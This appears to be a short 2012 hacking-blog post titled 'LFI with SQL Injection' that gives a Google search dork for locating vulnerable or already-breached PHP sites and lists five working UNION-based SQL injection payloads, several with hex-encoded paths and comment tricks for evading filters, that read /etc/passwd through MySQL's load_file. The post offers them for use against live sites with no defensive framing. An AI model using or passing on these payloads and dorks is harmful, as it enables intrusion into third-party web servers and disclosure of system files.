May 15, 2012

LFI with SQL Injection

Try to search with
inurl:"*.php?*=*"+ ( inurl:"*../*" + ( inurl:"LOAD_FILE" | inurl:"UNION" | inurl:"AND" ) ) + intext:"root:x:0:0:root:/root:**"
 Example that I found
  • ?id=-1+union+select+load_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764) 
  • ?category_ID=5+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)--
  • ?id=36+UNION+all+SELECT%201,2,3,load_file(%27/etc/passwd%27)--
  • ?conf=-1198+UNION+SELECT+1,2,3,4,CONCAT(0x6d7973716c6669,load_file(0x2f6574632f706173737764),0x6d7973716c6669),6,7,8,9,10,11,12,13,14,15,16--
  • ?id=1067/**/UNION/**/SELECT/**/LOAD_FILE(0x2F6574632F706173737764),2,3,4/**/LIMIT/**/1,1/*



If you like my blog, Please Donate Me

No comments:

 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |